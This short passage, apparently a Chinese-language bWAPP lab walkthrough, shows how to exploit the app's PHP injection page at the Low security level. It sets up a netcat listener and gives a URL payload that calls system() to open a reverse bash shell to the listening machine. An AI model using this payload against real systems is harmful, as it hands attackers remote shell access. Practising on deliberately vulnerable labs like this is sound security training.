Low:

開啟Mac的終端，輸入ifconfig檢視本機IP：

➜  ~ ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
	options=1203<RXCSUM,TXCSUM,TXSTATUS,SW_TIMESTAMP>
	inet 127.0.0.1 netmask 0xff000000
	inet6 ::1 prefixlen 128
	inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1
	nd6 options=201<PERFORMNUD,DAD>
gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280
stf0: flags=0<> mtu 1280
XHC20: flags=0<> mtu 0
en5: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	options=4<VLAN_MTU>
	ether 00:e0:4c:36:09:77
	nd6 options=201<PERFORMNUD,DAD>
	media: autoselect (none)
	status: inactive
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
	ether 98:01:a7:a8:05:3f
	inet6 fe80::18e2:f23d:250:5c25%en0 prefixlen 64 secured scopeid 0x6
	inet 10.0.3.172 netmask 0xffffff00 broadcast 10.0.3.255
	nd6 options=201<PERFORMNUD,DAD>
	media: autoselect
	status: active
 

然後使用nc命令監聽本地7890埠：

➜  nc -v -l 7890

然後直接在bWAPP的位址列裡輸入http://localhost/bWAPP/phpi.php?message=test;system('nc 10.0.3.172 7890 -e /bin/bash')按回車，即可在Mac上拿到Shell。

Medium and High:

因為使用了htmlspecialchars()函式過濾，所以無解。